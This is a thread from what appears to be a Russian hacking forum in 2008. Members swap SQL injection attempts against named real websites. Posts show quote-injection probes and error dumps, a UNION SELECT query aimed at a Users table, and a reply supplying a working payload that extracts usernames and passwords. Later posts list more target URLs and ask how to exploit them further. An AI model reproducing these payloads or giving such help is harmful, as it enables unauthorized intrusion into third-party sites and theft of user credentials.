24.06.2008, 01:01
|
|
Новичок
Регистрация: 21.06.2008
Сообщений: 17
С нами:
9414616
Репутация:
18
|
|
Red_Red1,скинь плз ссылку в приват.(с розруленой скулей)
|
|
|
24.06.2008, 12:03
|
|
Постоянный
Регистрация: 07.11.2007
Сообщений: 392
С нами:
9741777
Репутация:
100
|
|
Подставляю кавычку, выплевывает следующее:
[quote]
Microsoft VBScript runtime error '800a000d'
Type mismatch: 'cint'
/page.asp, line 7[./quote]
Это MSSQL? Если да, почему тогда не работает статья [ cash ]?
|
|
|
|
24.06.2008, 12:07
|
|
Познающий
Регистрация: 22.04.2008
Сообщений: 32
С нами:
9501269
Репутация:
56
|
|
Сообщение от Ershik
Подставляю кавычку, выплевывает следующее:
Microsoft VBScript runtime error '800a000d'
Type mismatch: 'cint'
/page.asp, line 7
Это MSSQL? Если да, почему тогда не работает статья [ cash ]?
Это не ошибка MSSQL, это VB. 
Последний раз редактировалось z3r0cool; 24.06.2008 в 12:25..
|
|
|
|
24.06.2008, 12:11
|
|
Постоянный
Регистрация: 07.11.2007
Сообщений: 392
С нами:
9741777
Репутация:
100
|
|
Значит, что либо сделать невозможно.
http://www.goteborg.com/default.aspx?id=-1' - Здесь аналогично?
Page -1 was not found
Description: An unhandled exception occurred during the execution of the current web request. Please review the stack trace for more information about the error and where it originated in the code.
Exception Details: EPiServer.Core.PageNotFoundException: Page -1 was not found
Source Error:
An unhandled exception was generated during the execution of the current web request. Information regarding the origin and location of the exception can be identified using the exception stack trace below.
Stack Trace:
[PageNotFoundException: Page -1 was not found]
EPiServer.DataAccess.PageLoadDB.Load(PageReference pageLink) +698
EPiServer.DataFactory.ᐂ(PageReference ) +50
EPiServer.DataFactory.GetPage(PageReference pageLink, AccessLevel access) +496
EPiServer.PageBase.GetPage(PageReference pageLink) +171
EPiServer.SimplePage.get_CurrentPage() +177
EPiServer.EditPage.get_CurrentPage() +218
EPiServer.UserControlBase.get_CurrentPage() +21
Goteborg.templates.Units.TopMenu.InitDropDown() +15
Goteborg.templates.Units.TopMenu.OnInit(EventArgs e) +58
System.Web.UI.Control.InitRecursive(Control namingContainer) +240
System.Web.UI.Control.InitRecursive(Control namingContainer) +178
System.Web.UI.Control.InitRecursive(Control namingContainer) +178
System.Web.UI.Control.InitRecursive(Control namingContainer) +178
System.Web.UI.Control.InitRecursive(Control namingContainer) +178
System.Web.UI.Control.InitRecursive(Control namingContainer) +178
System.Web.UI.Control.InitRecursive(Control namingContainer) +178
System.Web.UI.Page.ProcessRequestMain() +197
|
|
|
|
24.06.2008, 12:23
|
|
Познающий
Регистрация: 22.04.2008
Сообщений: 32
С нами:
9501269
Репутация:
56
|
|
Сообщение от Ershik
Значит, что либо сделать невозможно.
http://www.goteborg.com/default.aspx?id=-1' - Здесь аналогично?
Да, вообще там используется System.Number.ParseInt32.
|
|
|
|
25.06.2008, 12:27
|
|
Познающий
Регистрация: 07.08.2006
Сообщений: 66
С нами:
10399666
Репутация:
94
|
|
Вот у меня несколько вопросов
Нашел сайт нашел все таблицы+ колонки вопрос как прочитать колонки в таблице если я делаю запрос типу
Код:
http://www.expressionindesign.com/post.php?id=29'+union+select+1,2,3,id,username,password,7,8,9,10,11,12,13,14+FROM+Users+LIMIT+1,1/*
В таблице Users имеются следующие колонки
Код:
Users
--id,username,password,email
Возможно я чтото делаю не так или нужно шифровать? (пробовал в HEX шифровать кое где и не получилось)
в придачу даю список всех таблиц
Код:
CHARACTER_SETS
COLLATIONS
COLLATION_CHARACTER_SET_APPLICABILITY
COLUMNS
COLUMN_PRIVILEGES
KEY_COLUMN_USAGE
ROUTINES
SCHEMATA
SCHEMA_PRIVILEGES
STATISTICS
TABLES
TABLE_CONSTRAINTS
TABLE_PRIVILEGES
TRIGGERS
USER_PRIVILEGES
VIEWS
Blog
Cats
Comment
My_places
Portfolio
Snippet
Snippet_cat
Snippet_language
Tags
Testimonials
Top_cat
Top_rated
User
Users
|
|
|
|
25.06.2008, 12:40
|
|
Постоянный
Регистрация: 28.09.2007
Сообщений: 820
С нами:
9799586
Репутация:
1385
|
|
http://www.expressionindesign.com/post.php?id=29'+union+select+1,2,concat_ws(0x3a,us ername,password),3,4,5,7,8,9,0,1,2,3,4+from+users/*
лови .. и думай ..
|
|
|
|
25.06.2008, 19:17
|
|
Постоянный
Регистрация: 07.11.2007
Сообщений: 392
С нами:
9741777
Репутация:
100
|
|
http://www.pemshop.com/detail.aspx?ID=1%20or%201=(select%20system_user)-- - с этим можно что нибудь сделать?
Аналогичный прошлый вопрос.
|
|
|
|
25.06.2008, 19:28
|
|
Познавший АНТИЧАТ
Регистрация: 18.02.2008
Сообщений: 1,136
С нами:
9593606
Репутация:
4915
|
|
Ershik
Только расскрытие пути
|
|
|
|
25.06.2008, 19:31
|
|
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
С нами:
10585560
Репутация:
1550
|
|
http://mini-abo.eu/index.php?m=price&sstring=-1'&go=%CF%EE%E8%F1%EA
скуля...какие предложения по раскрутке?
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид
